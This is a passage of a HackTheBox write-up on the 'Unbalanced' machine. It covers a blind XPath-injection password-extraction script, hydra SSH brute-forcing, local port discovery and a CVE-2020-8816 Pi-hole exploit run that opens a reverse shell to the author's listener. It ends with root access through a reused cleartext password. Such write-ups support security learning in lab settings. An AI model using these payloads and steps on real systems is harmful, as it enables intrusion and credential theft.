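    shape = re.compile(r"^' or Username='([^']*)' and (.*) and ''='$")

    def oracle(payload):
        m = shape.match(payload)
        if not m or m.group(1) not in users:
            return False
        pw, cond = users[m.group(1)], m.group(2)
        m_len = re.fullmatch(r"string-length\(Password\)=(\d+)", cond)
        if m_len:
            return len(pw) == int(m_len.group(1))
        m_sub = re.fullmatch(r"substring\(Password,(\d+),1\)='(.*)'", cond)
        if m_sub:
            pos = int(m_sub.group(1))         # 1-based; position 0 selects nothing
            return 1 <= pos <= len(pw) and pw[pos - 1] == m_sub.group(2)
        return False

    return oracle


# Constructed user store: bryan's password is the one recovered on the page; the
# others are made up to exercise special characters and an untestable quote.
SAMPLE_USERS = {"bryan": "ireallyl0vebubblegum!!!", "jim": "st@irs{2}:heaven", "rita": "it's"}

if __name__ == "__main__":
    oracle = fake_oracle(SAMPLE_USERS)
    for name in SAMPLE_USERS:
        print("%s:%s" % (name, extract_password(name, oracle)))
```

Asking for the length first costs a handful of requests and gives a clean stop condition, instead of relying on "no character matched" as the end of the string, which is indistinguishable from a character that simply is not in the charset.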

The passwords did not get me far on the web page; it just showed the user's name, job title and e-mail.

Getting the User Flag

Then I tried the same credentials against SSH on the box with hydra (-L takes a list of user names, -P a list of passwords) and got a hit for bryan.

root@nav1n:~/htb/unbalanced # hydra -L users.txt -P pass.txt 10.10.10.200 -t 4 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-08-04 01:13:37
[DATA] max 4 tasks per 1 server, overall 4 tasks, 4 login tries (l:1/p:4), ~1 try per task
[DATA] attacking ssh://10.10.10.200:22/
[22][ssh] host: 10.10.10.200   login: bryan   password: ireallyl0vebubblegum!!!
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-08-04 01:13:43
root@nav1n:~/htb/unbalanced # 

I immediately SSHed in as bryan. The user flag is in his home directory.

With the user compromised, I enumerated bryan's home directory and found a file called TODO:

bryan@unbalanced:~$ cat TODO 
############
# Intranet #
############
* Install new intranet-host3 docker [DONE]
* Rewrite the intranet-host3 code to fix Xpath vulnerability [DONE]
* Test intranet-host3 [DONE]
* Add intranet-host3 to load balancer [DONE]
* Take down intranet-host1 and intranet-host2 from load balancer (set as quiescent, weight zero) [DONE]
* Fix intranet-host2 [DONE]
* Re-add intranet-host2 to load balancer (set default weight) [DONE]
- Fix intranet-host1 [TODO]
- Re-add intranet-host1 to load balancer (set default weight) [TODO]

###########
# Pi-hole #
###########
* Install Pi-hole docker (only listening on 127.0.0.1) [DONE]
* Set temporary admin password [DONE]
* Create Pi-hole configuration script [IN PROGRESS]
- Run Pi-hole configuration script [TODO]
- Expose Pi-hole ports to the network [TODO]
bryan@unbalanced:~$ 

According to the TODO list, bryan has installed Pi-hole in a docker container listening on localhost only, with a temporary admin password; the configuration script is still in progress and has not been run yet. Since Pi-hole is not exposed to the network, I have to find which local ports it is listening on.

netstat is not installed on the box, so I needed another way. I found a blog post by staaldraad on doing netstat without netstat by decoding /proc/net/tcp with awk:

The command:

# netstatawk - from https://staaldraad.github.io/2017/12/20/netstat-without-netstat/
netstatawk() { ( awk 'function hextodec(str,ret,n,i,k,c){
    ret = 0
    n = length(str)
    for (i = 1; i <= n; i++) {
        c = tolower(substr(str, i, 1))
        k = index("123456789abcdef", c)
        ret = ret * 16 + k
    }
    return ret
}
function getIP(str,ret){
    ret=hextodec(substr(str,index(str,":")-2,2));
    for (i=5; i>0; i-=2) {
        ret = ret"."hextodec(substr(str,i,2))
    }
    ret = ret":"hextodec(substr(str,index(str,":")+1,4))
    return ret
}
NR > 1 {{if(NR==2)print "Local - Remote";local=getIP($2);remote=getIP($3)}{print local" - "remote}}' /proc/net/tcp ) }

Running the function on the box over SSH gave me the list of sockets: ports 8080 and 5553 are listening on 127.0.0.1.
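As an added example (neither the post's script nor staaldraad's), here is the same decoding in Python, with the socket state decoded so that listeners can be told apart from established connections, and with the /proc/net/tcp6 layout handled too. Like the awk version it assumes a little-endian host, which is why the octets of 127.0.0.1 show up reversed as 0100007F. The sample table is constructed to match what the box showed, not copied from it.

```python
import socket
import struct

# Socket states as printed in the 'st' column (include/net/tcp_states.h).
TCP_STATES = {
    "01": "ESTABLISHED", "02": "SYN_SENT", "03": "SYN_RECV", "04": "FIN_WAIT1",
    "05": "FIN_WAIT2", "06": "TIME_WAIT", "07": "CLOSE", "08": "CLOSE_WAIT",
    "09": "LAST_ACK", "0A": "LISTEN", "0B": "CLOSING",
}

# Constructed sample in the format of /proc/net/tcp, matching the situation on the
# box: 8080 and 5553 bound to 127.0.0.1, sshd on 0.0.0.0:22 with one session
# established from 10.10.14.22. Not a capture from the machine.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 0100007F:1F90 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 21473 1 0000000000000000 100 0 0 10 0
   1: 0100007F:15B1 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 21480 1 0000000000000000 100 0 0 10 0
   2: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 18211 1 0000000000000000 100 0 0 10 0
   3: C80A0A0A:0016 160E0A0A:C4E2 01 00000000:00000000 00:00000000 00000000  1000        0 30110 1 0000000000000000 20 4 30 10 -1
"""


def decode_endpoint(field):
    """'0100007F:1F90' -> ('127.0.0.1', 8080). The kernel prints the address in
    host byte order (little-endian on x86, hence the reversed octets) and the port
    as plain hex. /proc/net/tcp6 prints four such 32-bit words for the address."""
    addr_hex, port_hex = field.split(":")
    if len(addr_hex) == 8:
        ip = socket.inet_ntoa(struct.pack("<I", int(addr_hex, 16)))
    else:
        words = [int(addr_hex[i:i + 8], 16) for i in range(0, 32, 8)]
        ip = socket.inet_ntop(socket.AF_INET6, struct.pack("<4I", *words))
    return ip, int(port_hex, 16)


def parse_proc_net_tcp(text):
    """Rows of /proc/net/tcp or tcp6 as dicts with decoded endpoints, state and uid."""
    rows = []
    for line in text.splitlines()[1:]:          # skip the header line
        f = line.split()
        if len(f) < 8:
            continue
        rows.append({
            "local": decode_endpoint(f[1]),
            "remote": decode_endpoint(f[2]),
            "state": TCP_STATES.get(f[3], f[3]),
            "uid": int(f[7]),
        })
    return rows


def listening_sockets(text):
    """Sorted (ip, port) pairs in LISTEN state: the 'which ports are open locally'
    question the awk one-liner answers, but with the state decoded."""
    return sorted(r["local"] for r in parse_proc_net_tcp(text) if r["state"] == "LISTEN")


def established_peers(text):
    """(local, remote) endpoint pairs of ESTABLISHED connections: who is talking to the box."""
    return [(r["local"], r["remote"]) for r in parse_proc_net_tcp(text) if r["state"] == "ESTABLISHED"]


if __name__ == "__main__":
    for ip, port in listening_sockets(SAMPLE_PROC_NET_TCP):
        print("LISTEN %s:%d" % (ip, port))
```

On a real box, read /proc/net/tcp, /proc/net/tcp6 and, for DNS-type services, /proc/net/udp as well; the awk version only looks at the first of these.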

I used curl to find which port hosts Pi-hole: 5553 does not answer at all, and 8080 returns an "Invalid domain!" error, which is Pi-hole's block page complaining about the Host header:

bryan@unbalanced:~$ curl --max-time 10 http://127.0.0.1:5553
curl: (28) Operation timed out after 10001 milliseconds with 0 bytes received
bryan@unbalanced:~$ curl --max-time 10 http://127.0.0.1:8080
[ERROR]: Unable to parse results from <i>queryads.php</i>: <code>Unhandled error message (<code>Invalid domain!</code>)</code>
bryan@unbalanced:~$ 

With a Host header of unbalanced, I got the real page:

bryan@unbalanced:~$ curl --max-time 10 http://127.0.0.1:8080 -H 'Host: unbalanced'
<!DOCTYPE html>
<!-- Pi-hole: A black hole for Internet advertisements
*  (c) 2017 Pi-hole, LLC (https://pi-hole.net)
------snip------

<footer><span>Monday 10:50 PM, August 03rd.</span> Pi-hole v4.3.2-0-ge41c4b5 (pihole.unbalanced.htb/172.31.11.3)</footer>
</div>

----snip-----
</body></html>
bryan@unbalanced:~$ 

The footer reveals another subdomain, pihole.unbalanced.htb, on the internal IP 172.31.11.3. The host name again does not work from outside, but the IP is inside the 172.16.0.0/12 range the Squid ACL allows, so I can reach the web interface through the proxy by IP.

The Pi-hole dashboard lives under /admin; browsing there brought up the login page.

The TODO list says a temporary admin password was set; "admin" worked on http://172.31.11.3/admin/index.php?login.

(screenshot: Pi-hole admin dashboard)

Exploiting Pi-hole Version v4.3.2

The dashboard shows Pi-hole 4.3.2, and I knew there is an exploit for that version: the web admin interface is vulnerable to authenticated remote command execution, CVE-2020-8816 (fixed in 4.3.3).

Looking for exploits, I found one by AndreyRainchik and downloaded it. I could not get it to work remotely through the proxy, so I ran it locally against an SSH port forward of the Pi-hole web port.

Getting a Reverse Shell as www-data

I set up the SSH port forward:

root@nav1n:~/htb/unbalanced # ssh -NL 8080:127.0.0.1:8080 bryan@10.10.10.200

Then I started a listener in one terminal and ran the exploit (CVE-2020-8816) against the forwarded port from another, giving it the admin password and my listener's address and port:

root@nav1n:~/htb/unbalanced # python3 CVE-2020-8816.py http://127.0.0.1:8080 admin 10.10.14.22 9999

And there it is: a reverse shell as www-data, inside the Pi-hole container.

Going through the directories, I found that www-data in this container can read /root/. That's insane. It holds two files, ph_install.sh and pihole_config.sh. I read pihole_config.sh first (the configuration script the TODO list says is still in progress) and, as suspected, it sets the admin web password in clear text, together with the admin e-mail:

Root.txt

$ cat pihole_config.sh
#!/bin/bash
# Add domains to whitelist
/usr/local/bin/pihole -w unbalanced.htb
/usr/local/bin/pihole -w rebalanced.htb
# Set temperature unit to Celsius
/usr/local/bin/pihole -a -c
# Add local host record
/usr/local/bin/pihole -a hostrecord pihole.unbalanced.htb 127.0.0.1
# Set privacy level
/usr/local/bin/pihole -a -l 4
# Set web admin interface password
/usr/local/bin/pihole -a -p 'bUbBl3gUm$43v3Ry0n3!'
# Set admin email
/usr/local/bin/pihole -a email admin@unbalanced.htb
$ 

That admin password is reused for root on the host: back in the SSH session as bryan, su root with it gave me a root shell and root.txt.

That's it. I just pwned the Unbalanced machine. Thank you for your visit and I hope you enjoyed this insane ride.

Navin

Hey there, I'm Navin, a passionate Info-Sec enthusiast from Bahrain. I started this blog to share my knowledge. I usually write on HackTheBox machines and challenges, cybersecurity-related articles and bug-bounty. If you are an HTB user and like my articles, please respect here: Profile: https://www.hackthebox.eu/nav1n
